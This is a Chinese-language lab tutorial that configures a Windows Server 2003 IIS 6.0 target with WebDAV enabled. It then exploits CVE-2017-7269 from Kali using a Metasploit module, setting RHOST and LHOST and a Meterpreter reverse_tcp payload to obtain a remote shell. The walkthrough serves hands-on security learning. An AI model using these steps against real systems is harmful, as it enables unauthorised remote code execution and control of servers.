配置環境:Windows server 2003 靶機
kali2.0以上版本
前言:做實驗之前要確定一下靶機與攻擊主機可以互相通信
一、配置Windows server 2003 靶機
1、打開添加/洗掉windows程式點擊添加/洗掉windows組件
2、安裝iis6.0中間件:
3、打開iis將iis中的webDAV改為允許
4、打開網站找到默認網站右擊屬性,將ip地址改為本機ip地址
這個時候呢我們的靶機已經配置完畢了,接下來我們來配置我們的kali
二、開啟kali
(第一次使用msfconsole的時候我們要配置一下資料庫連接問題,具體請看我的上一篇文章)
1、接下來我們將下載好的exp傳到/usr/share/metasploit-framework/modules/exploits/windows/iis目錄下
(這里我將cve-2017-7269的名字改為了cve_2017_7269,因為我發現我名字是cve-2017-7269的話在msfconsole中查詢不到上傳成功并且進不去exp)
2、打開我們的msfconsole,并且查看一下是否傳入成功
search cve_2017_7269
3、然后進入到exp里面
use exploits/windows/iis/cve_2017_7269
4、查看源配置:
show options
5、設定靶機IP、靶機埠、攻擊IP、對方網站、回傳載荷:
命令格式如下:
設定靶機IP: set RHOST 靶機ip
設定靶機埠(上圖可見,默認埠為80,這里我靶機的埠改為了8080,如果你們沒改的話這里不用設定):set HTTPHOST 對方網站
設定回傳載荷:set payload windows/meterpreter/reverse_tcp
設定攻擊IP:set LHOST 攻擊主機IP
6、進行溢位
exploit
7、獲取shell:
shell
轉載請註明出處,本文鏈接:https://www.uj5u.com/ruanti/238101.html
標籤:其他
上一篇:用myqr輸出炫麗二維碼